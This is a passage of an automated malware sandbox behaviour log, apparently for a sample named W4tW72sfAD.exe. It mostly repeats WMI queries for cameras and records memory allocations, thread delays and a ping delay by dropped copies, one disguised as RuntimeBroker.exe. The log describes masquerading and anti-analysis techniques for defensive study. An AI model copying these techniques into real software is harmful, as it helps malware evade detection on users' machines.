                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeMemory allocated: 2CF0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeMemory allocated: 1AF90000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 15C0000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1B030000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: BB0000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1A810000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 15E0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 1B4A0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 2610000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 1A610000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: F50000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1AC50000 memory reserve | memory write watch
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1080000 memory reserve | memory write watch
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1AE30000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: DC0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 1ABA0000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1910000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1B390000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: C90000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1AA00000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: BF0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 1AAA0000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1720000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1B1F0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 2F00000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 1B010000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B8C8355 sldt word ptr [eax]19_2_00007FFD9B8C8355
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 600000
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599890
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599781
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599671
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599562
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599453
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 597229
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 597094
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596969
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596794
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596617
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 600000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 599853
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 3600000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598907
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598203
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597563
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597344
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597094
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596938
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596766
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596640
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596531
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596422
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596259
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596107
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 300000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595954
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595828
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595580
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595438
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595266
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595140
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595014
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594906
